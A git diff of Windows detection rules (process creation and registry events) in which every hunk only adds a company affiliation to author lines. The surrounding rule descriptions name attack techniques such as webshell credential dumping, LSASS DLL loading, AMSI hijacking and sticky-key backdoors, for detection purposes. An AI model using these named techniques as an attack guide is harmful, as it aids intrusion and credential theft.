+++ b/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml
@@ -6,7 +6,7 @@ references:
 - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments
 - https://thedfirreport.com/2022/09/26/bumblebee-round-two/
 - https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/14
 modified: 2022/09/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml b/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml
index dceba6165..ff711d765 100644
--- a/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml
+++ b/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells
 references:
 - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/
-author: Florian Roth (rule), MSTI (query)
+author: Florian Roth (Nextron Systems), MSTI (query)
 date: 2022/10/01
 tags:
 - attack.persistence
diff --git a/rules/windows/process_creation/proc_creation_win_webshell_detection.yml b/rules/windows/process_creation/proc_creation_win_webshell_detection.yml
index 723889fa4..222a150a4 100644
--- a/rules/windows/process_creation/proc_creation_win_webshell_detection.yml
+++ b/rules/windows/process_creation/proc_creation_win_webshell_detection.yml
@@ -5,7 +5,7 @@ description: Detects certain command line parameters often used during reconnais
 references:
 - https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html
 - https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/
-author: Florian Roth, Jonhnathan Ribeiro, Anton Kutepov, oscd.community
+author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community
 date: 2017/01/01
 modified: 2022/05/13
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml b/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml
index 4822d1a9d..6cde34743 100644
--- a/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml
+++ b/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system
 references:
 - https://youtu.be/7aemGhaE9ds?t=641
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/17
 modified: 2022/08/04
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml b/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml
index 7fbd71e88..e7da4c834 100644
--- a/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml
+++ b/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack
 references:
 - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF
-author: Thomas Patzke, Florian Roth, Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (update)
+author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
 date: 2019/01/16
 modified: 2022/09/19
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml b/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml
index b6c832c27..75e74fecb 100644
--- a/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml
+++ b/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects usage of the wevtutil utility to perform reconnaissance
 references:
 - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/09
 modified: 2023/01/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml b/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml
index d37b66104..75ece93e3 100644
--- a/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml
+++ b/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml
@@ -5,7 +5,7 @@ description: Detects a whoami.exe executed by privileged accounts that are often
 references:
 - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
 - https://nsudo.m2team.org/en-us/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/28
 modified: 2022/05/13
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_whoami_priv.yml b/rules/windows/process_creation/proc_creation_win_whoami_priv.yml
index 7370c9299..d4e68ae09 100644
--- a/rules/windows/process_creation/proc_creation_win_whoami_priv.yml
+++ b/rules/windows/process_creation/proc_creation_win_whoami_priv.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privieleges. This is often used after a privilege escalation attempt.
 references:
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/05/05
 modified: 2022/05/13
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml b/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml
index 2ac009b49..7c50158d1 100644
--- a/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml
+++ b/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml
@@ -5,7 +5,7 @@ description: Detects suspicious children spawned via the Windows Terminal applic
 references:
 - https://persistence-info.github.io/Data/windowsterminalprofile.html
 - https://twitter.com/nas_bench/status/1550836225652686848
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/25
 modified: 2023/01/22
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml b/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml
index a2615d740..6c5a5daf9 100644
--- a/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml
+++ b/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml
@@ -5,7 +5,7 @@ description: Detects a WMI backdoor in Exchange Transport Agents via WMI event f
 references:
 - https://twitter.com/cglyer/status/1182389676876980224
 - https://twitter.com/cglyer/status/1182391019633029120
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/10/11
 modified: 2022/03/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml b/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml
index dee3a59b6..cb94f2dbd 100644
--- a/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml
+++ b/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model...etc.
 references:
 - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/08
 modified: 2022/11/29
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml b/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml
index f6ab207ee..4828ad28c 100644
--- a/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml
+++ b/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml
@@ -5,7 +5,7 @@ description: Detects wmic known recon method to look for installed hotfixes, oft
 references:
 - https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat
 - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/20
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_wmic_security_product_uninstall.yml b/rules/windows/process_creation/proc_creation_win_wmic_security_product_uninstall.yml
index f5a91fe30..44982d71c 100644
--- a/rules/windows/process_creation/proc_creation_win_wmic_security_product_uninstall.yml
+++ b/rules/windows/process_creation/proc_creation_win_wmic_security_product_uninstall.yml
@@ -8,7 +8,7 @@ references:
 - https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions
 - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/
 - https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html
-author: Florian Roth, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
 date: 2021/01/30
 modified: 2023/01/26
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_wmic_service.yml b/rules/windows/process_creation/proc_creation_win_wmic_service.yml
index 1d14f4df2..55ec089c3 100644
--- a/rules/windows/process_creation/proc_creation_win_wmic_service.yml
+++ b/rules/windows/process_creation/proc_creation_win_wmic_service.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects usage of wmic to start or stop a service
 references:
 - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/20
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml b/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml
index 4a2df61d5..e04e6a343 100644
--- a/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml
+++ b/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml
@@ -9,7 +9,7 @@ references:
 - https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py
 - https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1
 - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/20
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml b/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml
index 192997634..8dec86498 100644
--- a/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml
+++ b/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml
@@ -5,7 +5,7 @@ description: Detects execution of the binary "wpbbin" which is used as part of t
 references:
 - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
 - https://persistence-info.github.io/Data/wpbbin.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/18
 tags:
 - attack.persistence
diff --git a/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml b/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml
index 8180a229c..15ede48b4 100644
--- a/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml
+++ b/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity
 references:
 - http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/31
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml b/rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml
index f5bc9b3f9..4c06960e0 100644
--- a/rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml
+++ b/rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml
@@ -8,7 +8,7 @@ description: Detects uncommon or suspicious child processes spawning from a WSL
 references:
 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/
 - https://twitter.com/nas_bench/status/1535431474429808642
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/23
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml b/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml
index 015d42d08..9642bbbfe 100644
--- a/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)
 references:
 - https://github.com/M2Team/Privexec/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/02
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml b/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml
index 31f064b7c..8e1a57014 100644
--- a/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml
+++ b/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument which is not longer supported. This could indicate an attacker using an old technique
 references:
 - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/04
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml b/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml
index 2101f57a3..dc0288a3e 100644
--- a/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml
+++ b/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml
@@ -5,7 +5,7 @@ description: Detects usage of the "wusa.exe" (Windows Update Standalone Installe
 references:
 - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html
 - https://www.echotrail.io/insights/search/wusa.exe/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/05
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_xordump.yml b/rules/windows/process_creation/proc_creation_win_xordump.yml
index e156582ed..b05b1cac1 100644
--- a/rules/windows/process_creation/proc_creation_win_xordump.yml
+++ b/rules/windows/process_creation/proc_creation_win_xordump.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious use of XORDump process memory dumping utility
 references:
 - https://github.com/audibleblink/xordump
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/28
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml b/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml
index b369a0815..229e23af8 100644
--- a/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml
+++ b/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml
@@ -5,7 +5,7 @@ description: Detects when an attacker registers a new AMSI provider in order to
 references:
 - https://persistence-info.github.io/Data/amsi.html
 - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/21
 modified: 2022/12/19
 tags:
diff --git a/rules/windows/registry/registry_add/registry_add_disk_cleanup_handler_new_entry_persistence.yml b/rules/windows/registry/registry_add/registry_add_disk_cleanup_handler_new_entry_persistence.yml
index 82894f1c9..8d74e0da0 100644
--- a/rules/windows/registry/registry_add/registry_add_disk_cleanup_handler_new_entry_persistence.yml
+++ b/rules/windows/registry/registry_add/registry_add_disk_cleanup_handler_new_entry_persistence.yml
@@ -11,7 +11,7 @@ description: |
 references:
 - https://persistence-info.github.io/Data/diskcleanuphandler.html
 - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/21
 tags:
 - attack.persistence
diff --git a/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml b/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml
index c0e5aab00..7ad63984a 100644
--- a/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml
+++ b/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml
@@ -9,7 +9,7 @@ status: experimental
 description: Detects the "accepteula" key related to sysinternals tools being created from non sysinternals tools
 references:
 - Internal Research
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/24
 modified: 2022/12/07
 tags:
diff --git a/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml b/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml
index e441962d1..2ba030176 100644
--- a/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml
+++ b/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects the usage of Suspicious Sysinternals Tools such as PsExec, Procdump...etc via the "accepteula" key being added to Registry
 references:
 - https://twitter.com/Moti_B/status/1008587936735035392
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/24
 tags:
 - attack.resource_development
diff --git a/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml b/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml
index aee728d58..ee57fbdae 100644
--- a/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml
+++ b/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. Which could indicate an attacker trying to launch an encryption process
 references:
 - https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/05
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml b/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml
index 13b30a03d..bf9d4c827 100644
--- a/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml
+++ b/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml
@@ -6,7 +6,7 @@ references:
 - https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer
 - http://woshub.com/how-to-clear-rdp-connections-history/
 - https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/10/19
 modified: 2022/03/26
 tags:
diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml b/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml
index 486c1ae92..77d0c1f3b 100644
--- a/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml
+++ b/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml
@@ -9,7 +9,7 @@ status: experimental
 description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"
 references:
 - https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/26
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml b/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml
index 72bd1813c..ac33f7f5b 100644
--- a/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml
+++ b/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Sysmon registry detection of a local hidden user account.
 references:
 - https://twitter.com/SBousseaden/status/1387530414185664538
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/05/03
 modified: 2022/08/05
 tags:
diff --git a/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml b/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml
index 6bf31e085..3ec4c0129 100644
--- a/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml
+++ b/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018
 references:
 - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/
-author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
+author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
 date: 2018/03/23
 modified: 2022/11/27
 tags:
diff --git a/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml b/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml
index ab3b5c255..4c9c69806 100755
--- a/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml
+++ b/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml
@@ -5,7 +5,7 @@ description: Detects Pandemic Windows Implant
 references:
 - https://wikileaks.org/vault7/#Pandemic
 - https://twitter.com/MalwareJake/status/870349480356454401
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/06/01
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml b/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml
index 625d0cf95..99265f73f 100755
--- a/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml
+++ b/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the use of Windows Credential Editor (WCE)
 references:
 - https://www.ampliasecurity.com/research/windows-credentials-editor/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/12/31
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml b/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml
index 279985d14..30bb7583b 100644
--- a/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml
+++ b/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects NetNTLM downgrade attack
 references:
 - https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks
-author: Florian Roth, wagga
+author: Florian Roth (Nextron Systems), wagga
 date: 2018/03/20
 modified: 2022/11/29
 tags:
diff --git a/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml b/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml
index e0a0c86a4..b2e7385f6 100644
--- a/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml
+++ b/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml
@@ -7,7 +7,7 @@ references:
 - https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/
 - https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass
 - https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/30
 modified: 2022/01/13
 tags:
diff --git a/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml b/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml
index f0069ff5d..754dc705d 100644
--- a/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml
+++ b/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml
@@ -8,7 +8,7 @@ description: Detects changes to the Registry in which a monitor program gets reg
 references:
 - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/
 - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/02/26
 modified: 2022/12/19
 tags:
diff --git a/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml b/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml
index 230d2cc0a..07dac37b7 100755
--- a/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml
+++ b/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml
@@ -5,7 +5,7 @@ description: Detects the usage and installation of a backdoor that uses an optio
 references:
 - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/
 - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/
-author: Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community
+author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
 date: 2018/03/15
 modified: 2022/11/26
 tags:
diff --git a/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml b/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml
index f46485a59..59e7c09b9 100755
--- a/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml
+++ b/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories
 references:
 - https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/10/01
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml b/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml
index 5d8f745cd..c29fea94c 100644
--- a/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml
+++ b/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml
@@ -5,7 +5,7 @@ description: Detects a method to load DLL via LSASS process using an undocumente
 references:
 - https://blog.xpnsec.com/exploring-mimikatz-part-1/
 - https://twitter.com/SBousseaden/status/1183745981189427200
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/10/16
 modified: 2022/04/21
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml b/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml
index 5270e6600..1265beba0 100644
--- a/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml
+++ b/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml
@@ -5,7 +5,7 @@ description: Detects when an attacker adds a new "Debugger" value to the "AeDebu
 references:
 - https://persistence-info.github.io/Data/aedebug.html
 - https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/21
 tags:
 - attack.persistence
diff --git a/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml b/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml
index bc803a81c..8b7acfd1b 100644
--- a/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml
+++ b/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml
@@ -5,7 +5,7 @@ description: Detects changes to the AMSI come server registry key in order disab
 references:
 - https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
 - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/04
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml b/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml
index 8ab969495..c3db5c123 100644
--- a/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml
+++ b/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects disabling the CrashDump per registry (as used by HermeticWiper)
 references:
 - https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/
-author: Tobias Michalski
+author: Tobias Michalski (Nextron Systems)
 date: 2022/02/24
 modified: 2022/08/23
 tags:
